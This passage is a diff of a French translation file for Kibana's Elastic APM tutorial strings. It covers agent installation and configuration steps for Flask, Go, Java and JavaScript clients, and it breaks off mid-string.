"xpack.apm.tutorial.flaskClient.configure.commands.allowedCharactersComment": "a-z, A-Z, 0-9, -, _ et espace", "xpack.apm.tutorial.flaskClient.configure.commands.configureElasticApmComment": "ou configurer l'utilisation d'ELASTIC_APM dans les paramètres de votre application", "xpack.apm.tutorial.flaskClient.configure.commands.initializeUsingEnvironmentVariablesComment": "initialiser à l'aide des variables d'environnement", - "xpack.apm.tutorial.flaskClient.configure.commands.setCustomApmServerUrlComment": "Définir l'URL personnalisée du serveur APM (par défaut : {defaultApmServerUrl})", - "xpack.apm.tutorial.flaskClient.configure.commands.setRequiredServiceNameComment": "Définissez le nom de service obligatoire. Caractères autorisés :", + "xpack.apm.tutorial.flaskClient.configure.commands.setRequiredServiceNameComment": "Définissez le nom de service obligatoire. Caractères autorisés :", "xpack.apm.tutorial.flaskClient.configure.commands.setServiceEnvironmentComment": "Définir l'environnement de service", "xpack.apm.tutorial.flaskClient.configure.commands.useIfApmServerRequiresTokenComment": "À utiliser si le serveur APM requiert un token secret", - "xpack.apm.tutorial.flaskClient.configure.textPost": "Consultez la [documentation]({documentationLink}) pour une utilisation avancée.", "xpack.apm.tutorial.flaskClient.configure.textPre": "Les agents sont des bibliothèques exécutées dans les processus de votre application. Les services APM sont créés par programmation à partir du \"SERVICE_NAME\".", "xpack.apm.tutorial.flaskClient.configure.title": "Configurer l'agent", "xpack.apm.tutorial.flaskClient.install.textPre": "Installez l'agent APM pour Python en tant que dépendance.", "xpack.apm.tutorial.flaskClient.install.title": "Installer l'agent APM", "xpack.apm.tutorial.fleet.title": "Fleet", - "xpack.apm.tutorial.goClient.configure.commands.initializeUsingEnvironmentVariablesComment": "Initialisez à l'aide des variables d'environnement :", - "xpack.apm.tutorial.goClient.configure.commands.setCustomApmServerUrlComment": "Définir l'URL de serveur APM personnalisée (par défaut : {defaultApmServerUrl})", + "xpack.apm.tutorial.goClient.configure.commands.initializeUsingEnvironmentVariablesComment": "Initialisez à l'aide des variables d'environnement :", "xpack.apm.tutorial.goClient.configure.commands.setServiceEnvironment": "Définir l'environnement de service", - "xpack.apm.tutorial.goClient.configure.commands.setServiceNameComment": "Configurez le nom de service. Caractères autorisés : # a-z, A-Z, 0-9, -, _ et espace.", + "xpack.apm.tutorial.goClient.configure.commands.setServiceNameComment": "Configurez le nom de service. Caractères autorisés : # a-z, A-Z, 0-9, -, _ et espace.", "xpack.apm.tutorial.goClient.configure.commands.usedExecutableNameComment": "Si ELASTIC_APM_SERVICE_NAME n'est pas spécifié, le nom de l'exécutable sera utilisé.", "xpack.apm.tutorial.goClient.configure.commands.useIfApmRequiresTokenComment": "À utiliser si le serveur APM requiert un token secret", - "xpack.apm.tutorial.goClient.configure.textPost": "Consultez la [documentation]({documentationLink}) pour une configuration avancée.", "xpack.apm.tutorial.goClient.configure.textPre": "Les agents sont des bibliothèques exécutées dans les processus de votre application. Les services APM sont créés par programmation à partir du nom du fichier exécutable, ou de la variable d'environnement \"ELASTIC_APM_SERVICE_NAME\".", "xpack.apm.tutorial.goClient.configure.title": "Configurer l'agent", "xpack.apm.tutorial.goClient.install.textPre": "Installez les packages d'agent APM pour Go.", "xpack.apm.tutorial.goClient.install.title": "Installer l'agent APM", - "xpack.apm.tutorial.goClient.instrument.textPost": "Consultez la [documentation]({documentationLink}) pour obtenir un guide détaillé pour l'instrumentation du code source Go.", "xpack.apm.tutorial.goClient.instrument.textPre": "Pour instrumenter votre application Go, utilisez l'un des modules d'instrumentation proposés ou directement l'API de traçage.", "xpack.apm.tutorial.goClient.instrument.title": "Instrumenter votre application", "xpack.apm.tutorial.introduction": "Collectez les mesures de performance de vos applications avec Elastic APM.", - "xpack.apm.tutorial.javaClient.download.textPre": "Téléchargez le fichier jar de l'agent depuis [Maven Central]({mavenCentralLink}). N'ajoutez **pas** l'agent comme dépendance de votre application.", "xpack.apm.tutorial.javaClient.download.title": "Télécharger l'agent APM", - "xpack.apm.tutorial.javaClient.startApplication.textPost": "Consultez la [documentation]({documentationLink}) pour découvrir les options de configuration et l'utilisation avancée.", - "xpack.apm.tutorial.javaClient.startApplication.textPre": "Ajoutez l'indicateur \"-javaagent\" et configurez l'agent avec les propriétés du système.\n\n * Définir le nom de service requis (caractères autorisés : a-z, A-Z, 0-9, -, _ et espace)\n * Définir l'URL personnalisée du serveur APM (par défaut : {customApmServerUrl})\n * Définir le token secret du serveur APM\n * Définir l'environnement de service\n * Définir le package de base de votre application", "xpack.apm.tutorial.javaClient.startApplication.title": "Lancer votre application avec l'indicateur javaagent", - "xpack.apm.tutorial.jsClient.enableRealUserMonitoring.textPre": "Le serveur APM désactive la prise en charge du RUM par défaut. Consultez la [documentation]({documentationLink}) pour obtenir des détails sur l'activation de la prise en charge du RUM. Lorsque vous utilisez l'intégration APM avec Fleet, le support RUM est automatiquement activé.", "xpack.apm.tutorial.jsClient.enableRealUserMonitoring.title": "Activer la prise en charge du Real User Monitoring (monitoring des utilisateurs réels) dans le serveur APM", - "xpack.apm.tutorial.jsClient.installDependency.commands.setCustomApmServerUrlComment": "Définir l'URL de serveur APM personnalisée (par défaut : {defaultApmServerUrl})", - "xpack.apm.tutorial.jsClient.installDependency.commands.setRequiredServiceNameComment": "Définir le nom de service requis (caractères autorisés : a-z, A-Z, 0-9, -, _ et espace)", + "xpack.apm.tutorial.jsClient.installDependency.commands.setRequiredServiceNameComment": "Définir le nom de service requis (caractères autorisés : a-z, A-Z, 0-9, -, _ et espace)", "xpack.apm.tutorial.jsClient.installDependency.commands.setServiceEnvironmentComment": "Définir l'environnement de service", "xpack.apm.tutorial.jsClient.installDependency.commands.setServiceVersionComment": "Définir la version de service (requis pour la fonctionnalité source map)", - "xpack.apm.tutorial.jsClient.installDependency.textPost": "Les intégrations de framework, tel que React ou Angular, ont des dépendances personnalisées. Consultez la [integration documentation]({docLink}) pour plus d'informations.", - "xpack.apm.tutorial.jsClient.installDependency.textPre": "Vous pouvez installer l'Agent comme dépendance de votre application avec \"npm install @elastic/apm-rum --save\".\n\nVous pouvez ensuite initialiser l'agent et le configurer dans votre application de cette façon :", + "xpack.apm.tutorial.jsClient.installDependency.textPre": "Vous pouvez installer l'Agent comme dépendance de votre application avec \"npm install @elastic/apm-rum --save\".\n\nVous pouvez ensuite initialiser l'agent et le configurer dans votre application de cette façon :", "xpack.apm.tutorial.jsClient.installDependency.title": "Configurer l'agent comme dépendance", "xpack.apm.tutorial.jsClient.scriptTags.textPre": "Vous pouvez également utiliser les balises Script pour configurer l'agent. Ajoutez un indicateur \"